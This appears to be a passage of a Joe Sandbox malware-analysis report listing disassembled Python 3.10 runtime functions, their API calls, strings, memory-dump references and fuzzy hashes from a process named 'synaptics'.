                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                                                                                                                                      • String ID: {for
                                                                                                                                                                                                      • API String ID: 2795783184-864106941
                                                                                                                                                                                                      • Opcode ID: c282cb9ab35169cb033bc72194dfd595988b8205fe4e1e735e52784d14dd0278
                                                                                                                                                                                                      • Instruction ID: ed567dcce919c41079f0c13c817fe656389b36cc58791dbf7faa78bbab242536
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c282cb9ab35169cb033bc72194dfd595988b8205fe4e1e735e52784d14dd0278
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F414272A002489FEB06DFA8C996BDA7BFDAF09300F54445AE18AAB2D8DF345941C754
                                                                                                                                                                                                      Function 6C58F990 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(?,000000FF,000000FF,00000000), ref: 6C58F9F0
                                                                                                                                                                                                      • PyLong_FromUnsignedLong.PYTHON310(?), ref: 6C58FA1A
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,?), ref: 6C58FA2E
                                                                                                                                                                                                        • Part of subcall function 6C473BB0: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000645), ref: 6C473BDE
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C58FA72
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58FA91
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C58FA98
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Dict_EnterErr_FormatFromItemLeaveLongLong_ReleaseSemaphoreThread_acquire_lock_timedUnsigned
                                                                                                                                                                                                      • String ID: sys._current_frames
                                                                                                                                                                                                      • API String ID: 3078914570-3261429576
                                                                                                                                                                                                      • Opcode ID: ee3664f1246f1fc9ad25a04f497d754ae0181784187d7801d664e70ca521d336
                                                                                                                                                                                                      • Instruction ID: aea84a409af7b3e5470121af3a7108e04f95b5aa1474af6b48794b6470a051e0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee3664f1246f1fc9ad25a04f497d754ae0181784187d7801d664e70ca521d336
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D031DB317027118FC310DE69CC80E17B7E4EB89338F14476CE9699BB90E738E9058B91
                                                                                                                                                                                                      Function 6C58CDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyType_IsSubtype.PYTHON310(?,?), ref: 6C58CDDF
                                                                                                                                                                                                      • _PyLong_AsTime_t.PYTHON310(?), ref: 6C58CDEC
                                                                                                                                                                                                        • Part of subcall function 6C58CA10: PyLong_AsLongLong.PYTHON310(?), ref: 6C58CA19
                                                                                                                                                                                                        • Part of subcall function 6C58CA10: PyErr_GivenExceptionMatches.PYTHON310(00000000,6C73BD78), ref: 6C58CA45
                                                                                                                                                                                                        • Part of subcall function 6C58C910: _PyErr_SetObject.PYTHON310(?,6C73BD78,00000000,00000000,00000000,00000000,?,?,?,?,?,6C58CA56), ref: 6C58C940
                                                                                                                                                                                                      • PyFloat_AsDouble.PYTHON310(?), ref: 6C58CE1C
                                                                                                                                                                                                      • _isnan.API-MS-WIN-CRT-MATH-L1-1-0(?,?), ref: 6C58CE31
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000), ref: 6C58CE67
                                                                                                                                                                                                      • modf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C58CEBD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Invalid value NaN (not a number), xrefs: 6C58CE4F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$LongLong_Object$DoubleExceptionFloat_GivenMatchesSubtypeTime_tType__isnanmodf
                                                                                                                                                                                                      • String ID: Invalid value NaN (not a number)
                                                                                                                                                                                                      • API String ID: 1704221126-798329126
                                                                                                                                                                                                      • Opcode ID: 0ff57fa34abaca759dc63d7e95d11529cc34ae07453ad353facc896af793ef2c
                                                                                                                                                                                                      • Instruction ID: 133ed510560053be7c949c610c84fa6aa3f28aa4d7794d238a10c17404bd50f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ff57fa34abaca759dc63d7e95d11529cc34ae07453ad353facc896af793ef2c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92315D72A026149BC701EF39AC4165673B8EF823B9F10477AFC18DB691EB31E85583A1
                                                                                                                                                                                                      Function 6C4DDD10 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 111COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyCodec_LookupError.PYTHON310(00000001,00000000,00000000,00000001,00000001,?,6C4D9321,utf-8,surrogates not allowed,?,?,00000000,00000001,?,?,?), ref: 6C4DDD22
                                                                                                                                                                                                      • _PyUnicode_Ready.PYTHON310(?,00000000,00000000,00000001,00000001,?,6C4D9321,utf-8,surrogates not allowed,?,?,00000000,00000001,?,?,?), ref: 6C4DDD3E
                                                                                                                                                                                                      • _PyErr_SetString.PYTHON310(00000000,6C73BFE8,encoding error handler must return (str/bytes, int) tuple,?,?,?,?,?,00000000,00000001,?,?,?,00000000,?,6C4DA724), ref: 6C4DDDAC
                                                                                                                                                                                                      • _PyArg_ParseTuple_SizeT.PYTHON310(00000000,On;encoding error handler must return (str/bytes, int) tuple,?,?,?,00000000,00000001,?,?,?,00000000,?,6C4DA724,?,?,00000001), ref: 6C4DDDC2
                                                                                                                                                                                                        • Part of subcall function 6C56CFA0: _PyErr_SetString.PYTHON310(00000000,6C73C9A8,new style getargs format but argument is not a tuple,00000000,?,?,6C4D8673,00000000,On;encoding error handler must return (str/bytes, int) tuple,?,?,?,?,?,?,00000000), ref: 6C56CFD6
                                                                                                                                                                                                      • PyErr_Format.PYTHON310(position %zd from error handler out of bounds,?,?,?,?,?,?,00000000,00000001,?,?,?,00000000,?,6C4DA724,?), ref: 6C4DDE1A
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_Clear.PYTHON310(?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B62
                                                                                                                                                                                                        • Part of subcall function 6C566B50: PyUnicode_FromFormatV.PYTHON310(?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B6C
                                                                                                                                                                                                        • Part of subcall function 6C566B50: _PyErr_SetObject.PYTHON310(?,?,00000000,?,00000001,?,00000001,?,?,6C41B1C5,Signal %i ignored due to race condition,00000001,?,?), ref: 6C566B78
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • On;encoding error handler must return (str/bytes, int) tuple, xrefs: 6C4DDDBC
                                                                                                                                                                                                      • position %zd from error handler out of bounds, xrefs: 6C4DDE0F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatStringUnicode_$Arg_ClearCodec_ErrorFromLookupObjectParseReadySizeTuple_
                                                                                                                                                                                                      • String ID: On;encoding error handler must return (str/bytes, int) tuple$position %zd from error handler out of bounds
                                                                                                                                                                                                      • API String ID: 3301919159-2634944473
                                                                                                                                                                                                      • Opcode ID: e93d8f6fcb8857366e3257a4b52f08b276a0f0f4771323c188af7f11367cf809
                                                                                                                                                                                                      • Instruction ID: bd762b6e840a52bcec640a094b18a78d07a2f7d69952b0af927c0b66e85486e5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e93d8f6fcb8857366e3257a4b52f08b276a0f0f4771323c188af7f11367cf809
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2310A71A045069FDB00DE29DC10E96B3B4EF95239B154628EC2887BA1E731F815CFE1
                                                                                                                                                                                                      Function 6C551EE0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetStart.PYTHON310(?,?), ref: 6C551F2A
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetEnd.PYTHON310(?,?), ref: 6C551F3B
                                                                                                                                                                                                      • PyUnicodeEncodeError_GetObject.PYTHON310(?), ref: 6C551F48
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: EncodeError_Unicode$ObjectStart
                                                                                                                                                                                                      • String ID: (Nn)$Hsl
                                                                                                                                                                                                      • API String ID: 1524412634-533674607
                                                                                                                                                                                                      • Opcode ID: 19090bb1fa2b665ab4d426315a34b5996a9fb04f742c64b2e76261abb68cc560
                                                                                                                                                                                                      • Instruction ID: a6d84f16e1a11fc770c89e3e1446a9ee7c17770836c5ba8d9120a827ad8cea9f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 19090bb1fa2b665ab4d426315a34b5996a9fb04f742c64b2e76261abb68cc560
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BC31F772F012015BDB14DE99DC8089FB3B9AF84368B58427AED09D7B00E736ED5187E1
                                                                                                                                                                                                      Function 6C5B0B30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyException_SetTraceback.PYTHON310(6C5B0103,?,?,00000001,?,?,6C5B0CBA,00000001,?,00000000,6C5B0103,00000000,?,6C5B0103,00000000,?), ref: 6C5B0B6A
                                                                                                                                                                                                      • PyType_GenericAlloc.PYTHON310(?,00000000,?,00000001,?,?,6C5B0CBA,00000001,?,00000000,6C5B0103,00000000,?,6C5B0103,00000000,?), ref: 6C5B0B8C
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?), ref: 6C5B0BF1
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E118,?,?,?,?), ref: 6C5B0C0C
                                                                                                                                                                                                      • PyObject_VectorcallMethod.PYTHON310(00000000,?,80000001,00000000,?,?,?,?,?), ref: 6C5B0C24
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?,?,?,?,?,?), ref: 6C5B0C4E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ClearErr_$AllocException_FromGenericMethodObject_TracebackType_Unicode_Vectorcall
                                                                                                                                                                                                      • String ID: Pntl
                                                                                                                                                                                                      • API String ID: 3098598338-2807539477
                                                                                                                                                                                                      • Opcode ID: 8e9e7b57cdb4c73fa21b278eaa5e312662c311417bde9f9afaae5bb92e1ca627
                                                                                                                                                                                                      • Instruction ID: 3f26ee2deca8c1695cfef36013f89012b7b9cb42704116eeecc89efb6a922bba
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9e7b57cdb4c73fa21b278eaa5e312662c311417bde9f9afaae5bb92e1ca627
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3431BFB16003019BD714CF65DD50F9BB7A4BB8132CF14462EE42997AA1E735E905CB91
                                                                                                                                                                                                      Function 6C58DCD0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140()qXl,00000000,00000168,?,?), ref: 6C58DD44
                                                                                                                                                                                                      • PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE5D
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: CreateSemaphoreA.KERNEL32(00000000,00000000,000186A0,00000000), ref: 6C5BC547
                                                                                                                                                                                                        • Part of subcall function 6C5BC510: InitializeCriticalSection.KERNEL32(00000000), ref: 6C5BC55C
                                                                                                                                                                                                      • PyThread_allocate_lock.PYTHON310(?,?), ref: 6C58DE77
                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C58DE97
                                                                                                                                                                                                      • PyThread_allocate_lock.PYTHON310 ref: 6C58DEA0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread_allocate_lock$CreateCriticalCurrentInitializeSectionSemaphoreThreadmemset
                                                                                                                                                                                                      • String ID: )qXl$@bJl
                                                                                                                                                                                                      • API String ID: 2697089431-1832492514
                                                                                                                                                                                                      • Opcode ID: 5f7badb0a6f7eb9c6ff8ee4116bb41f753f05acade41b91a42e7e3c87b3d579c
                                                                                                                                                                                                      • Instruction ID: b8f7cfe32d319b80b3a0a577080a435e1c75b47de750e1617e37940040a6565e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f7badb0a6f7eb9c6ff8ee4116bb41f753f05acade41b91a42e7e3c87b3d579c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 545106B0901705CBEB00DF59C9997D97BB0BB49318F1482BADC189F396D775A588CFA0
                                                                                                                                                                                                      Function 6C5B9B80 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyList_New.PYTHON310(00000000), ref: 6C5B9BAD
                                                                                                                                                                                                      • _PyUnicode_FromId.PYTHON310(6C74E21C), ref: 6C5B9BC7
                                                                                                                                                                                                      • PyDict_SetItem.PYTHON310(?,00000000,00000000), ref: 6C5B9BE2
                                                                                                                                                                                                        • Part of subcall function 6C473BB0: _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\dictobject.c,00000645), ref: 6C473BDE
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\listobject.c,00000150), ref: 6C5B9C69
                                                                                                                                                                                                      • _PyErr_Clear.PYTHON310(?), ref: 6C5B9C76
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C5B9C5D
                                                                                                                                                                                                      • D:\a\1\s\Objects\listobject.c, xrefs: 6C5B9C58
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$Format$ClearDict_FromItemList_Unicode_
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\listobject.c
                                                                                                                                                                                                      • API String ID: 933113690-1334166624
                                                                                                                                                                                                      • Opcode ID: 4ce3fdd7ba35b2abbe719cdfec0d2074848d207fe7a352ad100a7afbf1115157
                                                                                                                                                                                                      • Instruction ID: 0daca1fca9a9aa2ca61d689be0af926dd98cf22402167e1a3b8974d606d456d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ce3fdd7ba35b2abbe719cdfec0d2074848d207fe7a352ad100a7afbf1115157
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0531FF757016019BD714CE59DDA1E9ABBF8AFA0318F10446CEC0AABB11DB30FD0487D1
                                                                                                                                                                                                      Function 6C453C90 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%R returned NULL without setting an exception,6C7393E8), ref: 6C453CF1
                                                                                                                                                                                                      • _PyErr_FormatFromCauseTstate.PYTHON310(?,%R returned a result with an exception set,6C7393E8), ref: 6C453D25
                                                                                                                                                                                                      • _PyObject_MakeTpCall.PYTHON310(?,6C7393E8,?,00000001,00000000), ref: 6C453D42
                                                                                                                                                                                                      • _Py_FatalError_TstateNULL.PYTHON310(PyThreadState_Get), ref: 6C453D59
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • %R returned NULL without setting an exception, xrefs: 6C453CE5
                                                                                                                                                                                                      • %R returned a result with an exception set, xrefs: 6C453D19
                                                                                                                                                                                                      • PyThreadState_Get, xrefs: 6C453D54
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
